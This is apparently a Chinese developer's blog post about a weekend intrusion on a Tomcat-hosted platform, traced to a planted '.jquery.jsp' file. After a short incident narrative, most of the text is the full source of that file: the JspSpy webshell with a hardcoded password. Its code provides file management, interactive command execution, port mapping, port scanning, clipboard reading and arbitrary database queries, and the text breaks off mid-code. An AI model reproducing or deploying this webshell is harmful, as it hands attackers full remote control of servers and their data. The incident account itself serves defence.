入侵(暴风雨前的宁静)
下午阳光甚好,想趁着安静的周末静下心来写写代码。刚过一个小时,3点左右,客服MM找我,告知客户都在说平台登录不了(我们有专门的客户qq群)。看了下数据库连接数,正常。登录阿里云发现cpu 居高不下。客户还在等着,只好先重启tomcat。重启后平台登陆正常。本以为是用户导数据或者连接池被占用光了(这个以前出现过,也比较坑),重启下就会没事。
15分钟左右,客服MM又找我,说平台打开很慢。
我打开登录页面加载都很慢,这时候还是不知道什么问题,上阿里云看看,一看发现有攻击。
看了下攻击的访问url,是访问一个.jquery.jsp的文件。通过ftp查看到此文件有个密码,直接通过地址访问登录,这一登录不得了,网站目录全部显示在页面上,还可以进行操作,赶紧把文件当下来一份,删除掉。
<%@page pageEncoding="utf-8"%> <%@page import="java.io.*"%> <%@page import="java.util.*"%> <%@page import="java.util.regex.*"%> <%@page import="java.sql.*"%> <%@page import="java.lang.reflect.*"%> <%@page import="java.nio.charset.*"%> <%@page import="javax.servlet.http.HttpServletRequestWrapper"%> <%@page import="java.text.*"%> <%@page import="java.net.*"%> <%@page import="java.util.zip.*"%> <%@page import="java.util.jar.*"%> <%@page import="java.awt.*"%> <%@page import="java.awt.image.*"%> <%@page import="javax.imageio.*"%> <%@page import="java.awt.datatransfer.DataFlavor"%> <%@page import="java.util.prefs.Preferences"%> <%!private static final String PW = "good";//password private static final String PW_SESSION_ATTRIBUTE = "JspSpyPwd"; private static final String REQUEST_CHARSET = "ISO-8859-1"; private static final String PAGE_CHARSET = "UTF-8"; private static final String CURRENT_DIR = "currentdir"; private static final String MSG = "SHOWMSG"; private static final String PORT_MAP = "PMSA"; private static final String DBO = "DBO"; private static final String SHELL_ONLINE = "SHELL_ONLINE"; private static final String ENTER = "ENTER_FILE"; private static final String ENTER_MSG = "ENTER_FILE_MSG"; private static final String ENTER_CURRENT_DIR = "ENTER_CURRENT_DIR"; private static final String SESSION_O = "SESSION_O"; private static String SHELL_NAME = ""; private static String WEB_ROOT = null; private static String SHELL_DIR = null; public static Map ins = new HashMap(); private static boolean ISLINUX = false; private static final String MODIFIED_ERROR = "JspSpy Was Modified By Some Other Applications. Please Logout."; private static final String BACK_HREF = " <a href='javascript:history.back()'>Back</a>"; private static class MyRequest extends HttpServletRequestWrapper { public MyRequest(HttpServletRequest req) { super(req); } public String getParameter(String name) { try { String value = super.getParameter(name); if (name == null) return null; return new String(value.getBytes(REQUEST_CHARSET), PAGE_CHARSET); } catch (Exception e) { return null; } } } private static class SpyClassLoader extends ClassLoader { public SpyClassLoader() { } public Class defineClass(String name, byte[] b) { return super.defineClass(name, b, 0, b.length - 2); } } private static class DBOperator { private Connection conn = null; private Statement stmt = null; private String driver; private String url; private String uid; private String pwd; public DBOperator(String driver, String url, String uid, String pwd) throws Exception { this(driver, url, uid, pwd, false); } public DBOperator(String driver, String url, String uid, String pwd, boolean connect) throws Exception { Class.forName(driver); if (connect) this.conn = DriverManager.getConnection(url, uid, pwd); this.url = url; this.driver = driver; this.uid = uid; this.pwd = pwd; } public void connect() throws Exception { this.conn = DriverManager.getConnection(url, uid, pwd); } public Object execute(String sql) throws Exception { if (isValid()) { stmt = conn.createStatement(); if (stmt.execute(sql)) { return stmt.getResultSet(); } else { return "" + stmt.getUpdateCount(); } } throw new Exception("Connection is inValid."); } public void closeStmt() throws Exception { if (this.stmt != null) stmt.close(); } public boolean isValid() throws Exception { return conn != null && !conn.isClosed(); } public void close() throws Exception { if (isValid()) { closeStmt(); conn.close(); } } public boolean equals(Object o) { if (o instanceof DBOperator) { DBOperator dbo = (DBOperator) o; return this.driver.equals(dbo.driver) && this.url.equals(dbo.url) && this.uid.equals(dbo.uid) && this.pwd.equals(dbo.pwd); } return false; } public Connection getConn() { return this.conn; } } private static class StreamConnector extends Thread { private InputStream is; private OutputStream os; public StreamConnector(InputStream is, OutputStream os) { this.is = is; this.os = os; } public void run() { BufferedReader in = null; BufferedWriter out = null; try { in = new BufferedReader(new InputStreamReader(this.is)); out = new BufferedWriter(new OutputStreamWriter(this.os)); char buffer[] = new char[8192]; int length; while ((length = in.read(buffer, 0, buffer.length)) > 0) { out.write(buffer, 0, length); out.flush(); } } catch (Exception e) { } try { if (in != null) in.close(); if (out != null) out.close(); } catch (Exception e) { } } public static void readFromLocal(final DataInputStream localIn, final DataOutputStream remoteOut) { new Thread(new Runnable() { public void run() { while (true) { try { byte[] data = new byte[100]; int len = localIn.read(data); while (len != -1) { remoteOut.write(data, 0, len); len = localIn.read(data); } } catch (Exception e) { break; } } } }).start(); } public static void readFromRemote(final Socket soc, final Socket remoteSoc, final DataInputStream remoteIn, final DataOutputStream localOut) { new Thread(new Runnable() { public void run() { while (true) { try { byte[] data = new byte[100]; int len = remoteIn.read(data); while (len != -1) { localOut.write(data, 0, len); len = remoteIn.read(data); } } catch (Exception e) { try { soc.close(); remoteSoc.close(); } catch (Exception ex) { } break; } } } }).start(); } } private static class EnterFile extends File { private ZipFile zf = null; private ZipEntry entry = null; private boolean isDirectory = false; private String absolutePath = null; public void setEntry(ZipEntry e) { this.entry = e; } public void setAbsolutePath(String p) { this.absolutePath = p; } public void close() throws Exception { this.zf.close(); } public void setZf(String p) throws Exception { if (p.toLowerCase().endsWith(".jar")) this.zf = new JarFile(p); else this.zf = new ZipFile(p); } public EnterFile(File parent, String child) { super(parent, child); } public EnterFile(String pathname) { super(pathname); } public EnterFile(String pathname, boolean isDir) { this(pathname); this.isDirectory = isDir; } public EnterFile(String parent, String child) { super(parent, child); } public EnterFile(URI uri) { super(uri); } public boolean exists() { return new File(this.zf.getName()).exists(); } public File[] listFiles() { java.util.List list = new ArrayList(); java.util.List handled = new ArrayList(); String currentDir = super.getPath(); currentDir = currentDir.replace('\\', '/'); if (currentDir.indexOf("/") == 0) { if (currentDir.length() > 1) currentDir = currentDir.substring(1); else currentDir = ""; } Enumeration e = this.zf.entries(); while (e.hasMoreElements()) { ZipEntry entry = (ZipEntry) e.nextElement(); String eName = entry.getName(); if (this.zf instanceof JarFile) { if (!entry.isDirectory()) { EnterFile ef = new EnterFile(eName); ef.setEntry(entry); try { ef.setZf(this.zf.getName()); } catch (Exception ex) { } list.add(ef); } } else { if (currentDir.equals("")) { //zip root directory if (eName.indexOf("/") == -1 || eName.matches("[^/]+/$")) { EnterFile ef = new EnterFile(eName.replaceAll("/", "")); handled.add(eName.replaceAll("/", "")); ef.setEntry(entry); list.add(ef); } else { if (eName.indexOf("/") != -1) { String tmp = eName.substring(0, eName .indexOf("/")); if (!handled.contains(tmp) && !Util.isEmpty(tmp)) { EnterFile ef = new EnterFile(tmp, true); ef.setEntry(entry); list.add(ef); handled.add(tmp); } } } } else { if (eName.startsWith(currentDir)) { if (eName.matches(currentDir + "/[^/]+/?$")) { //file. EnterFile ef = new EnterFile(eName); ef.setEntry(entry); list.add(ef); if (eName.endsWith("/")) { String tmp = eName.substring(eName .lastIndexOf('/', eName.length() - 2)); tmp = tmp.substring(1, tmp.length() - 1); handled.add(tmp); } } else { //dir try { String tmp = eName.substring(currentDir .length() + 1); tmp = tmp.substring(0, tmp.indexOf('/')); if (!handled.contains(tmp) && !Util.isEmpty(tmp)) { EnterFile ef = new EnterFile(tmp, true); ef.setAbsolutePath(currentDir + "/" + tmp); ef.setEntry(entry); list.add(ef); handled.add(tmp); } } catch (Exception ex) { } } } } } } return (File[]) list.toArray(new File[0]); } public boolean isDirectory() { return this.entry.isDirectory() || this.isDirectory; } public String getParent() { return ""; } public String getAbsolutePath() { return absolutePath != null ? absolutePath : super.getPath(); } public String getName() { if (this.zf instanceof JarFile) { return this.getAbsolutePath(); } else { return super.getName(); } } public long lastModified() { return entry.getTime(); } public boolean canRead() { return false; } public boolean canWrite() { return false; } public boolean canExecute() { return false; } public long length() { return entry.getSize(); } } private static class OnLineProcess { private String cmd = "first"; private Process pro; public OnLineProcess(Process p) { this.pro = p; } public void setPro(Process p) { this.pro = p; } public void setCmd(String c) { this.cmd = c; } public String getCmd() { return this.cmd; } public Process getPro() { return this.pro; } public void stop() { this.pro.destroy(); } } private static class OnLineConnector extends Thread { private OnLineProcess ol = null; private InputStream is; private OutputStream os; private String name; public OnLineConnector(InputStream is, OutputStream os, String name, OnLineProcess ol) { this.is = is; this.os = os; this.name = name; this.ol = ol; } public void run() { BufferedReader in = null; BufferedWriter out = null; try { in = new BufferedReader(new InputStreamReader(this.is)); out = new BufferedWriter(new OutputStreamWriter(this.os)); char buffer[] = new char[128]; if (this.name.equals("exeRclientO")) { //from exe to client int length = 0; while ((length = in.read(buffer, 0, buffer.length)) > 0) { String str = new String(buffer, 0, length); str = str.replaceAll("&", "&").replaceAll("<", "<").replaceAll(">", ">"); str = str.replaceAll("" + (char) 13 + (char) 10, "<br/>"); str = str.replaceAll("\n", "<br/>"); out.write(str.toCharArray(), 0, str.length()); out.flush(); } } else { //from client to exe while (true) { while (this.ol.getCmd() == null) { Thread.sleep(500); } if (this.ol.getCmd().equals("first")) { this.ol.setCmd(null); continue; } this.ol.setCmd(this.ol.getCmd() + (char) 10); char[] arr = this.ol.getCmd().toCharArray(); out.write(arr, 0, arr.length); out.flush(); this.ol.setCmd(null); } } } catch (Exception e) { } try { if (in != null) in.close(); if (out != null) out.close(); } catch (Exception e) { } } } private static class Table { private ArrayList rows = null; private boolean echoTableTag = false; public void setEchoTableTag(boolean v) { this.echoTableTag = v; } public Table() { this.rows = new ArrayList(); } public void addRow(Row r) { this.rows.add(r); } public String toString() { StringBuffer html = new StringBuffer(); if (echoTableTag) html.append("<table>"); for (int i = 0; i < rows.size(); i++) { Row r = (Row) rows.get(i); html .append("<tr class=\"alt1\" onMouseOver=\"this.className='focus';\" onMouseOut=\"this.className='alt1';\">"); ArrayList columns = r.getColumns(); for (int a = 0; a < columns.size(); a++) { Column c = (Column) columns.get(a); html.append("<td nowrap>"); String vv = Util.htmlEncode(Util.getStr(c.getValue())); if (vv.equals("")) vv = " "; html.append(vv); html.append("</td>"); } html.append("</tr>"); } if (echoTableTag) html.append("</table>"); return html.toString(); } public static String rs2Table(ResultSet rs, String sep, boolean op) throws Exception { StringBuffer table = new StringBuffer(); ResultSetMetaData meta = rs.getMetaData(); int count = meta.getColumnCount(); if (!op) table .append("<b style='color:red;margin-left:15px'><i> View Struct </i></b> - <a href=\"javascript:doPost({o:'executesql'})\">View All Tables</a><br/><br/>"); else table .append("<b style='color:red;margin-left:15px'><i> All Tables </i></b><br/><br/>"); table .append("<script>function view(t){document.getElementById('sql').value='select * from " + sep + "'+t+'" + sep + "';}</script>"); table .append("<table border=\"0\" cellpadding=\"3\" cellspacing=\"0\" style=\"margin-left:15px\"><tr class=\"head\">"); for (int i = 1; i <= count; i++) { table.append("<td nowrap>" + meta.getColumnName(i) + "</td>"); } if (op) table.append("<td> </td>"); table.append("</tr>"); while (rs.next()) { String tbName = null; table .append("<tr class=\"alt1\" onMouseOver=\"this.className='focus';\" onMouseOut=\"this.className='alt1';\">"); for (int i = 1; i <= count; i++) { String v = rs.getString(i); if (i == 3) tbName = v; table.append("<td nowrap>" + Util.null2Nbsp(v) + "</td>"); } if (op) table .append("<td nowrap> <a href=\"#\" onclick=\"view('" + tbName + "')\">View</a> | <a href=\"javascript:doPost({o:'executesql',type:'struct',table:'" + tbName + "'})\">Struct</a> | <a href=\"javascript:doPost({o:'export',table:'" + tbName + "'})\">Export </a> | <a href=\"javascript:doPost({o:'vExport',table:'" + tbName + "'})\">Save To File</a> </td>"); table.append("</tr>"); } table.append("</table><br/>"); return table.toString(); } } private static class Row { private ArrayList cols = null; public Row() { this.cols = new ArrayList(); } public void addColumn(Column n) { this.cols.add(n); } public ArrayList getColumns() { return this.cols; } } private static class Column { private String value; public Column(String v) { this.value = v; } public String getValue() { return this.value; } } private static class Util { public static boolean isEmpty(String s) { return s == null || s.trim().equals(""); } public static boolean isEmpty(Object o) { return o == null || isEmpty(o.toString()); } public static String getSize(long size, char danwei) { if (danwei == 'M') { double v = formatNumber(size / 1024.0 / 1024.0, 2); if (v > 1024) { return getSize(size, 'G'); } else { return v + "M"; } } else if (danwei == 'G') { return formatNumber(size / 1024.0 / 1024.0 / 1024.0, 2) + "G"; } else if (danwei == 'K') { double v = formatNumber(size / 1024.0, 2); if (v > 1024) { return getSize(size, 'M'); } else { return v + "K"; } } else if (danwei == 'B') { if (size > 1024) { return getSize(size, 'K'); } else { return size + "B"; } } return "" + 0 + danwei; } public static boolean exists(String[] arr, String v) { for (int i = 0; i < arr.length; i++) { if (v.equals(arr[i])) { return true; } } return false; } public static double formatNumber(double value, int l) { NumberFormat format = NumberFormat.getInstance(); format.setMaximumFractionDigits(l); format.setGroupingUsed(false); return new Double(format.format(value)).doubleValue(); } public static boolean isInteger(String v) { if (isEmpty(v)) return false; return v.matches("^\\d+$"); } public static String formatDate(long time) { SimpleDateFormat format = new SimpleDateFormat( "yyyy-MM-dd hh:mm:ss"); return format.format(new java.util.Date(time)); } public static String convertPath(String path) { return path != null ? path.replace('\\', '/') : ""; } public static String htmlEncode(String v) { if (isEmpty(v)) return ""; return v.replaceAll("&", "&").replaceAll("<", "<") .replaceAll(">", ">"); } public static String getStr(String s) { return s == null ? "" : s; } public static String null2Nbsp(String s) { if (s == null) s = " "; return s; } public static String getStr(Object s) { return s == null ? "" : s.toString(); } public static String exec(String regex, String str, int group) { Pattern pat = Pattern.compile(regex); Matcher m = pat.matcher(str); if (m.find()) return m.group(group); return null; } public static void outMsg(Writer out, String msg) throws Exception { outMsg(out, msg, "center"); } public static void outMsg(Writer out, String msg, String align) throws Exception { out .write("<div style=\"background:#f1f1f1;border:1px solid #ddd;padding:15px;font:14px;text-align:" + align + ";font-weight:bold;margin:10px\">" + msg + "</div>"); } public static String highLight(String str) { str = str .replaceAll( "\\b(abstract|package|String|byte|static|synchronized|public|private|protected|void|int|long|double|boolean|float|char|final|extends|implements|throw|throws|native|class|interface|emum)\\b", "<span style='color:blue'>$1</span>"); str = str.replaceAll("\t(//.+)", "\t<span style='color:green'>$1</span>"); return str; } } private static class UploadBean { private String fileName = null; private String suffix = null; private String savePath = ""; private ServletInputStream sis = null; private OutputStream targetOutput = null; private byte[] b = new byte[1024]; public void setTargetOutput(OutputStream stream) { this.targetOutput = stream; } public UploadBean() { } public void setSavePath(String path) { this.savePath = path; } public String getFileName() { return this.fileName; } public void parseRequest(HttpServletRequest request) throws IOException { sis = request.getInputStream(); int a = 0; int k = 0; String s = ""; while ((a = sis.readLine(b, 0, b.length)) != -1) { s = new String(b, 0, a, PAGE_CHARSET); if ((k = s.indexOf("filename=\"")) != -1) { s = s.substring(k + 10); k = s.indexOf("\""); s = s.substring(0, k); File tF = new File(s); if (tF.isAbsolute()) { fileName = tF.getName(); } else { fileName = s; } k = s.lastIndexOf("."); suffix = s.substring(k + 1); upload(); } } } private void upload() throws IOException { try { OutputStream out = null; if (this.targetOutput != null) out = this.targetOutput; else out = new FileOutputStream(new File(savePath, fileName)); int a = 0; int k = 0; String s = ""; while ((a = sis.readLine(b, 0, b.length)) != -1) { s = new String(b, 0, a); if ((k = s.indexOf("Content-Type:")) != -1) { break; } } sis.readLine(b, 0, b.length); while ((a = sis.readLine(b, 0, b.length)) != -1) { s = new String(b, 0, a); if ((b[0] == 45) && (b[1] == 45) && (b[2] == 45) && (b[3] == 45) && (b[4] == 45)) { break; } out.write(b, 0, a); } if (out instanceof FileOutputStream) out.close(); } catch (IOException ioe) { throw ioe; } } }%> <% SHELL_NAME = request.getServletPath().substring( request.getServletPath().lastIndexOf("/") + 1); String myAbsolutePath = application.getRealPath(request .getServletPath()); if (Util.isEmpty(myAbsolutePath)) {//for weblogic SHELL_NAME = request.getServletPath(); myAbsolutePath = new File(application.getResource("/") .getPath() + SHELL_NAME).toString(); SHELL_NAME = request.getContextPath() + SHELL_NAME; WEB_ROOT = new File(application.getResource("/").getPath()) .toString(); } else { WEB_ROOT = application.getRealPath("/"); } SHELL_DIR = Util.convertPath(myAbsolutePath.substring(0, myAbsolutePath.lastIndexOf(File.separator))); if (SHELL_DIR.indexOf('/') == 0) ISLINUX = true; else ISLINUX = false; if (session.getAttribute(CURRENT_DIR) == null) session.setAttribute(CURRENT_DIR, Util.convertPath(SHELL_DIR)); //request = new MyRequest(request); if (session.getAttribute(PW_SESSION_ATTRIBUTE) == null || !(session.getAttribute(PW_SESSION_ATTRIBUTE)).equals(PW)) { String o = request.getParameter("o"); if(o != null) o = new String(o.getBytes(REQUEST_CHARSET), PAGE_CHARSET); if (o != null && o.equals("login")) { ((Invoker) ins.get("login")).invoke(request, response, session); return; } else if (o != null && o.equals("vLogin")) { ((Invoker) ins.get("vLogin")).invoke(request, response, session); return; } else { ((Invoker) ins.get("vLogin")).invoke(request, response, session); return; } } %> <%!private static interface Invoker { public void invoke(HttpServletRequest request, HttpServletResponse response, HttpSession JSession) throws Exception; public boolean doBefore(); public boolean doAfter(); } private static class DefaultInvoker implements Invoker { public void invoke(HttpServletRequest request, HttpServletResponse response, HttpSession JSession) throws Exception { } public boolean doBefore() { return true; } public boolean doAfter() { return true; } } private static class ScriptInvoker extends DefaultInvoker { public void invoke(HttpServletRequest request, HttpServletResponse response, HttpSession JSession) throws Exception { try { PrintWriter out = response.getWriter(); out .println("<script type=\"text/javascript\">" + " String.prototype.trim = function(){return this.replace(/^\\s+|\\s+$/,'');};" + " function fso(obj) {" + " this.currentDir = '" + JSession.getAttribute(CURRENT_DIR) + "';" + " this.filename = obj.filename;" + " this.path = obj.path;" + " this.filetype = obj.filetype;" + " this.charset = obj.charset;" + " };" + " fso.prototype = {" + " copy:function(){" + " var path = prompt('Copy To : ',this.path);" + " if (path == null || path.trim().length == 0 || path.trim() == this.path)return;" + " doPost({o:'copy',src:this.path,to:path});" + " }," + " move:function() {" + " var path =prompt('Move To : ',this.path);" + " if (path == null || path.trim().length == 0 || path.trim() == this.path)return;" + " doPost({o:'move',src:this.path,to:path})" + " }," + " vEdit:function() {" + " if (!this.charset)" + " doPost({o:'vEdit',filepath:this.path});" + " else" + " doPost({o:'vEdit',filepath:this.path,charset:this.charset});" + " }," + " down:function() {" + " doPost({o:'down',path:this.path})" + " }," + " removedir:function() {" + " if (!confirm('Dangerous ! Are You Sure To Delete '+this.filename+'?'))return;" + " doPost({o:'removedir',dir:this.path});" + " }," + " mkdir:function() {" + " var name = prompt('Input New Directory Name','');" + " if (name == null || name.trim().length == 0)return;" + " doPost({o:'mkdir',name:name});" + " }," + " subdir:function(out) {" + " doPost({o:'filelist',folder:this.path,outentry:(out || 'none')})" + " }," + " parent:function() {" + " var parent=(this.path.substr(0,this.path.lastIndexOf(\"/\")))+'/';" + " doPost({o:'filelist',folder:parent})" + " }," + " createFile:function() {" + " var path = prompt('Input New File Name','');" + " if (path == null || path.trim().length == 0) return;" + " doPost({o:'vCreateFile',filepath:path})" + " }," + " deleteBatch:function() {" + " if (!confirm('Are You Sure To Delete These Files?')) return;" + " var selected = new Array();" + " var inputs = document.getElementsByTagName('input');" + " for (var i = 0;i<inputs.length;i++){if(inputs[i].checked){selected.push(inputs[i].value)}}" + " if (selected.length == 0) {alert('No File Selected');return;}" + " doPost({o:'deleteBatch',files:selected.join(',')})" + " }," + " packBatch:function() {" + " var selected = new Array();" + " var inputs = document.getElementsByTagName('input');" + " for (var i = 0;i<inputs.length;i++){if(inputs[i].checked){selected.push(inputs[i].value)}}" + " if (selected.length == 0) {alert('No File Selected');return;}" + " var savefilename = prompt('Input Target File Name(Only Support ZIP)','pack.zip');" + " if (savefilename == null || savefilename.trim().length == 0)return;" + " doPost({o:'packBatch',files:selected.join(','),savefilename:savefilename})" + " }," + " pack:function(showconfig) {" + " if (showconfig && confirm('Need Pack Configuration?')) {doPost({o:'vPack',packedfile:this.path});return;}" + " var tmpName = '';" + " if (this.filename.indexOf('.') == -1) tmpName = this.filename;" + " else tmpName = this.filename.substr(0,this.filename.lastIndexOf('.'));" + " tmpName += '.zip';" + " var path = this.path;" + " var name = prompt('Input Target File Name (Only Support Zip)',tmpName);" + " if (name == null || path.trim().length == 0) return;" + " doPost({o:'pack',packedfile:path,savefilename:name})" + " }," + " vEditProperty:function() {" + " var path = this.path;" + " doPost({o:'vEditProperty',filepath:path})" + " }," + " unpack:function() {" + " var path = prompt('unpack to : ',this.currentDir+'/'+this.filename.substr(0,this.filename.lastIndexOf('.')));" + " if (path == null || path.trim().length == 0) return;" + " doPost({o:'unpack',savepath:path,zipfile:this.path})" + " }," + " enter:function() {" + " doPost({o:'enter',filepath:this.path})" + " }" + " };" + " function doPost(obj) {" + " var form = document.forms[\"doForm\"];" + " var elements = form.elements;for (var i = form.length - 1;i>=0;i--){form.removeChild(elements[i])}" + " for (var pro in obj)" + " {" + " var input = document.createElement(\"input\");" + " input.type = \"hidden\";" + " input.name = pro;" + " input.value = obj[pro];" + " form.appendChild(input);" + " }" + " form.submit();" + " }" + "</script>"); } catch (Exception e) { throw e; } } } private static class BeforeInvoker extends DefaultInvoker { public void invoke(HttpServletRequest request, HttpServletResponse response, HttpSession JSession) throws Exception { try { PrintWriter out = response.getWriter(); out .println("<html><head><title>JspSpy</title><style type=\"text/css\">" + "body,td{font: 12px Arial,Tahoma;line-height: 16px;}" + ".input{font:12px Arial,Tahoma;background:#fff;border: 1px solid #666;padding:2px;height:22px;}" + ".area{font:12px 'Courier New', Monospace;background:#fff;border: 1px solid #666;padding:2px;}" + ".bt {border-color:#b0b0b0;background:#3d3d3d;color:#ffffff;font:12px Arial,Tahoma;height:22px;}" + "a {color: #00f;text-decoration:underline;}" + "a:hover{color: #f00;text-decoration:none;}" + ".alt1 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#f1f1f1;padding:5px 10px 5px 5px;}" + ".alt2 td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#f9f9f9;padding:5px 10px 5px 5px;}" + ".focus td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#ffffaa;padding:5px 10px 5px 5px;}" + ".head td{border-top:1px solid #fff;border-bottom:1px solid #ddd;background:#e9e9e9;padding:5px 10px 5px 5px;font-weight:bold;}" + ".head td span{font-weight:normal;}" + "form{margin:0;padding:0;}" + "h2{margin:0;padding:0;height:24px;line-height:24px;font-size:14px;color:#5B686F;}" + "ul.info li{margin:0;color:#444;line-height:24px;height:24px;}" + "u{text-decoration: none;color:#777;float:left;display:block;150px;margin-right:10px;}" + ".secho{height:400px;100%;overflow:auto;border:none}" + "hr{border: 1px solid rgb(221, 221, 221); height: 0px;}" + "</style></head><body style=\"margin:0;table-layout:fixed; word-break:break-all\">"); } catch (Exception e) { throw e; } } } private static class AfterInvoker extends DefaultInvoker { public void invoke(HttpServletRequest request, HttpServletResponse response, HttpSession JSession) throws Exception { try { PrintWriter out = response.getWriter(); out.println("</body></html>"); } catch (Exception e) { throw e; } } } private static class DeleteBatchInvoker extends DefaultInvoker { public boolean doBefore() { return false; } public boolean doAfter() { return false; } public void invoke(HttpServletRequest request, HttpServletResponse response, HttpSession JSession) throws Exception { try { String files = request.getParameter("files"); int success = 0; int failed = 0; if (!Util.isEmpty(files)) { String currentDir = JSession.getAttribute(CURRENT_DIR) .toString(); String[] arr = files.split(","); for (int i = 0; i < arr.length; i++) { String fs = arr[i]; File f = new File(currentDir, fs); if (f.delete()) success += 1; else failed += 1; } } JSession .setAttribute( MSG, success + " Files Deleted <span style='color:green'>Success</span> , " + failed + " Files Deleted <span style='color:red'>Failed</span>!"); response.sendRedirect(SHELL_NAME); } catch (Exception e) { throw e; } } } private static class ClipBoardInvoker extends DefaultInvoker { public void invoke(HttpServletRequest request, HttpServletResponse response, HttpSession JSession) throws Exception { try { PrintWriter out = response.getWriter(); out .println("<table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\">" + " <tr>" + " <td>" + " <h2>System Clipboard »</h2>" + "<p><pre>"); try { out.println(Util.htmlEncode(Util.getStr(Toolkit .getDefaultToolkit().getSystemClipboard() .getContents(DataFlavor.stringFlavor) .getTransferData(DataFlavor.stringFlavor)))); } catch (Exception ex) { out.println("ClipBoard is Empty Or Is Not Text Data !"); } out .println("</pre>" + " <input class=\"bt\" name=\"button\" id=\"button\" onClick=\"history.back()\" value=\"Back\" type=\"button\" size=\"100\" />" + " </p>" + " </td>" + " </tr>" + "</table>"); } catch (Exception e) { throw e; } } } private static class VPortScanInvoker extends DefaultInvoker { public void invoke(HttpServletRequest request, HttpServletResponse response, HttpSession JSession) throws Exception { try { PrintWriter out = response.getWriter(); String ip = request.getParameter("ip"); String ports = request.getParameter("ports"); String timeout = request.getParameter("timeout"); String banner = request.getParameter("banner"); if (Util.isEmpty(ip)) ip = "127.0.0.1"; if (Util.isEmpty(ports)) ports = "21,25,80,110,1433,1723,3306,3389,4899,5631,43958,65500"; if (Util.isEmpty(timeout)) timeout = "2"; out .println("<table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\"><tr><td>" + "<h2 id=\"Bin_H2_Title\">PortScan >></h2>" + "<div id=\"YwLB\"><form action=\"" + SHELL_NAME + "\" method=\"post\">" + "<p><input type=\"hidden\" value=\"portScan\" name=\"o\">" + "IP : <input name=\"ip\" type=\"text\" value=\"" + ip + "\" id=\"ip\" class=\"input\" style=\"10%;margin:0 8px;\" /> Port : <input name=\"ports\" type=\"text\" value=\"" + ports + "\" id=\"ports\" class=\"input\" style=\"40%;margin:0 8px;\" /> <input " + (!Util.isEmpty(banner) ? "checked" : "") + " type='checkbox' value='yes' name='banner'/>Banner Timeout (Second) : <input name=\"timeout\" type=\"text\" value=\"" + timeout + "\" id=\"timeout\" class=\"input\" size=\"5\" style=\"margin:0 8px;\" /> <input type=\"submit\" name=\"submit\" value=\"Scan\" id=\"submit\" class=\"bt\" />" + "</p>" + "</form></div>" + "</td></tr></table>"); } catch (Exception e) { throw e; } } } private static class PortScanInvoker extends DefaultInvoker { public void invoke(HttpServletRequest request, HttpServletResponse response, HttpSession JSession) throws Exception { try { PrintWriter out = response.getWriter(); ((Invoker) ins.get("vPortScan")).invoke(request, response, JSession); out.println("<hr/>"); String ip = request.getParameter("ip"); String ports = request.getParameter("ports"); String timeout = request.getParameter("timeout"); String banner = request.getParameter("banner"); int iTimeout = 0; if (Util.isEmpty(ip) || Util.isEmpty(ports)) return; if (!Util.isInteger(timeout)) { timeout = "2"; } iTimeout = Integer.parseInt(timeout); Map rs = new LinkedHashMap(); String[] portArr = ports.split(","); for (int i = 0; i < portArr.length; i++) { String port = portArr[i]; BufferedReader r = null; try { Socket s = new Socket(); s.connect(new InetSocketAddress(ip, Integer .parseInt(port)), iTimeout); s.setSoTimeout(iTimeout); if (!Util.isEmpty(banner)) { r = new BufferedReader(new InputStreamReader(s .getInputStream())); StringBuffer sb = new StringBuffer(); String b = r.readLine(); while (b != null) { sb.append(b + " "); try { b = r.readLine(); } catch (Exception e) { break; } } rs.put(port, "Open <span style=\"color:grey;font-weight:normal\">" + sb.toString() + "</span>"); r.close(); } else { rs.put(port, "Open"); } s.close(); } catch (Exception e) { if (e.toString().toLowerCase() .indexOf("read timed out") != -1) { rs .put( port, "Open <span style=\"color:grey;font-weight:normal\"><<No Banner!>></span>"); if (r != null) r.close(); } else { rs.put(port, "Close"); } } } out.println("<div style='margin:10px'>"); Set entrySet = rs.entrySet(); Iterator it = entrySet.iterator(); while (it.hasNext()) { Map.Entry e = (Map.Entry) it.next(); String port = (String) e.getKey(); String value = (String) e.getValue(); out.println(ip + " : " + port + " ................................. <font color=" + (value.equals("Close") ? "red" : "green") + "><b>" + value + "</b></font><br>"); } out.println("</div>"); } catch (Exception e) { throw e; } } } private static class VConnInvoker extends DefaultInvoker { public void invoke(HttpServletRequest request, HttpServletResponse response, HttpSession JSession) throws Exception { try { PrintWriter out = response.getWriter(); Object obj = JSession.getAttribute(DBO); if (obj == null || !((DBOperator) obj).isValid()) { out .println(" <script type=\"text/javascript\">" + " function changeurldriver(){" + " var form = document.forms[\"form1\"];" + " var v = form.elements[\"db\"].value;" + " form.elements[\"url\"].value = v.split(\"`\")[1];" + " form.elements[\"driver\"].value = v.split(\"`\")[0];" + " form.elements[\"selectDb\"].value = form.elements[\"db\"].selectedIndex;" + " }" + " </script>"); out .println("<table width=\"100%\" border=\"0\" cellpadding=\"15\" cellspacing=\"0\"><tr><td>" + "<form name=\"form1\" id=\"form1\" action=\"" + SHELL_NAME + "\" method=\"post\" >" + "<input type=\"hidden\" id=\"selectDb\" name=\"selectDb\" value=\"0\">" + "<h2>DataBase Manager »</h2>" + "<input id=\"action\" type=\"hidden\" name=\"o\" value=\"dbc\" />" + "<p>" + "Driver:" + " <input class=\"input\" name=\"driver\" id=\"driver\" type=\"text\" size=\"35\" />" + "URL:" + "<input class=\"input\" name=\"url\" id=\"url\" value=\"\" type=\"text\" size=\"90\" />" + "UID:" + "<input class=\"input\" name=\"uid\" id=\"uid\" value=\"\" type=\"text\" size=\"10\" />" + "PWD:" + "<input class=\"input\" name=\"pwd\" id=\"pwd\" value=\"\" type=\"text\" size=\"10\" />" + "DataBase:" + " <select onchange='changeurldriver()' class=\"input\" id=\"db\" name=\"db\" >" + " <option value='com.mysql.jdbc.Driver`jdbc:mysql://localhost:3306/mysql?useUnicode=true&characterEncoding=GBK'>Mysql</option>" + " <option value='oracle.jdbc.driver.OracleDriver`jdbc:oracle:thin:@dbhost:1521:ORA1'>Oracle</option>" + " <option value='com.microsoft.jdbc.sqlserver.SQLServerDriver`jdbc:microsoft:sqlserver://localhost:1433;DatabaseName=master'>Sql Server</option>" + " <option value='sun.jdbc.odbc.JdbcOdbcDriver`jdbc:odbc:Driver={Microsoft Access Driver (*.mdb)};DBQ=C:\\ninty.mdb'>Access</option>" + " <option value=' ` '>Other</option>" + " </select>" + "<input class=\"bt\" name=\"connect\" id=\"connect\" 